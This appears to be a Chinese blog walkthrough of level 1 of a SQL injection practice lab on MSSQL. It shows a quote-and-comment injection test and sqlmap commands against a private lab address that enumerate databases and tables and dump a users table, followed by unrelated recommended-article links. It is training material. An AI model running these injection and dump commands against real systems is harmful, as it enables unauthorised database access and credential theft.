MSSQL 工具注入(第一关)

简介

SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

六、得到表中的数据

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民

相关推荐
凡人的AI工具箱17 分钟前
每天40分玩转Django:Django类视图
数据库·人工智能·后端·python·django·sqlite
知识的宝藏21 分钟前
Django models中的增删改查与MySQL SQL的对应关系
sql·mysql·django·django models
路在脚下@21 分钟前
MySQL的索引失效的原因有那些
数据库·mysql
千天夜22 分钟前
深度学习中的残差网络、加权残差连接(WRC)与跨阶段部分连接(CSP)详解
网络·人工智能·深度学习·神经网络·yolo·机器学习
凡人的AI工具箱27 分钟前
每天40分玩转Django:实操图片分享社区
数据库·人工智能·后端·python·django
CT随32 分钟前
MongoDB
数据库·mongodb
茶颜悦色vv1 小时前
Wireshark(1)
网络·web安全·网络安全·wireshark
上海文顺负载箱1 小时前
程控电阻箱应用中需要注意哪些安全事项?
安全
Fool丶玄浅1 小时前
【数据库系统概论】—— 关系数据库
数据库·数据库系统
xianwu5431 小时前
反向代理模块。开发
linux·开发语言·网络·c++·git